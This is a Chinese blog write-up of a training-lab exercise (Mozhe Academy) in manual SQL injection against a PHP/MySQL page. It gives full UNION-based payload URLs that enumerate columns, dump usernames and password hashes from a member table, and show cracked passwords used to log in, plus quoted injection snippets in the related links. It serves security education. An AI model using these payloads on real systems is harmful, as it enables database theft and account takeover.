SQL手工注入漏洞测试(MySQL数据库)

于 2021-07-26 20:31:16 发布
阅读量501 收藏
点赞数 1
分类专栏: WEB安全-SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45441315/article/details/119117256
版权

SQL手工注入漏洞测试-MySQL数据库

背景介绍

安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。
靶场地址

实训目标

1.掌握SQL注入原理;
2.了解手工注入的方法;
3.了解MySQL的数据结构;
4.了解字符串的MD5加解密;

解题方向

手工进行SQL注入测试,获取管理密码登录。

步骤

1.判断是否能注入

id=1 and 1=1 limit 0,1

在这里插入图片描述
报错,说明有注入可能
2.判断属性列数

id=1 order by 4

在这里插入图片描述

order by x(数字)1,2,3,4 网页都正确说明列数为4

3.报错猜解准备

http://219.153.49.228:43230/new_list.php?id=-1%20union%20%20select%201,2,3,4

发现2,3显示到页面上了。
在这里插入图片描述
4.信息收集
获得数据库:
在这里插入图片描述
更改limit 0,1为limit1,1继续搜索发现没有信息了
在这里插入图片描述
所有只含有一个数据库mozhe_Discuz_StormGroup

手动注入获得表

http://219.153.49.228:45026/new_list.php?id=-1%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27StormGroup_member%27

在这里插入图片描述
获取列名

5.获取数据

http://219.153.49.228:45026/new_list.php?id=-1%20union%20select%201,name,password,4%20%20from%20StormGroup_member

在这里插入图片描述
获得用户名和密码输入到登录框,发现还是错的
说明密码是进行加密过的
解密得到dsan13输入到登录框
在这里插入图片描述
弹出提示说明有可能被禁用了,或者还有其他用户
那么我们通过limit 1,1去获得第二行的数据

http://219.153.49.228:45026/new_list.php?id=-1%20union%20select%201,name,password,4%20%20from%20StormGroup_member%20limit%201,1

在这里插入图片描述
得到第二行数据进行md5解密得到207683
然后用mozhe和207683进行登录
最后登录。
在这里插入图片描述

硫酸超
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
weixin_42939822的博客
03-16 3583
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
Web安全基础学习:SQL注入漏洞Mysql注入
最新发布
qq_51862722的博客
06-18 944
SQL注入SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)...SQL手工注入漏洞测试(MySQL数据库)、SQL注入漏洞测试(delete注入)、SQL过滤字符后手工注入漏洞测试、延时注入(时间注入)等...
SQL注入漏洞发现和数据库监控系统.zip
05-27
SQL注入漏洞是网络安全领域中的一个重要话题,它主要发生在应用程序与数据库交互时,由于不恰当的输入验证导致恶意用户能够执行自定义SQL命令。本篇将深入探讨SQL注入漏洞的发现、修补技术和数据库监控系统的应用。 ...
sql server 2008 mysql 手工注入
03-25
手工注入,特别是SQL注入,是一种常见的安全漏洞,它允许攻击者通过构造恶意SQL语句来操纵或获取数据库中的敏感信息。在这个主题中,我们将深入探讨这两种数据库系统的SQL注入及其防范方法。 首先,SQL注入的原理是...
手工注入常用SQL语句.txt
07-18
MySQL数据库手工SQL注入示例 MySQL是另一种流行的开源关系型数据库管理系统,在手工SQL注入时可以采用的方法包括: - `and length(user()) > 0`:判断目标系统是否使用MySQL。 - `and ord(mid(version(), 1, 1))...
SQL注入漏洞挖掘.pptx
10-27
SQL 注入漏洞测试方式可以分为两种:手工测试和自动化测试手工测试是指攻击者手动构造测试语句,并分析返回结果,以判断是否存在 SQL 注入漏洞手工测试的优点是灵活性高,测试范围广泛,但缺点是效率低,...
SQL注入手工检测sql注入检测
04-21
sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测
手工SQL注入入侵
zhdd1234的专栏
09-15 724
检测可否注入  http://127.0.0.1/xx?id=11 and 1=1 (正常页面)  http://127.0.0.1/xx?id=11 and 1=2 (出错页面)  检测表段的  http://127.0.0.1/xx?id=11 and exists (select * from admin)  检测字段的  http://127.0.0.1/xx?id
Mysql SQL注入漏洞
weixin_34060741的博客
06-17 208
学习网址:http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html      https://www.cnblogs.com/sdya/p/4568548.html 网络安全:网络攻击技术——Broken authentication      网络攻击技术(三)——Denial Of Service      网络攻击技术(二...
墨者 - SQL手工注入漏洞测试(MySQL数据库)
吃肉唐僧的博客
07-02 725
/new_list.php?id=1 and 1=1,判断id的类型值是数字类型 /new_list.php?id=1 order by 4,测出数据库有4个字段,第5个不回显 测出页面回显位置 2和3 /new_list.php?id=1 and 1=2 union select 1,2,3,4 爆库 /new_list.php?id=1 and 1=2 uni...
sql手工注入漏洞测试(mysql数据库)
06-28
SQL手工注入漏洞测试是一种常见的安全测试方法,主要针对MySQL数据库。通过手动输入恶意代码,测试系统是否存在SQL注入漏洞,以此来发现和修复系统的安全漏洞。这种测试方法需要有一定的技术水平和经验,同时也需要...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值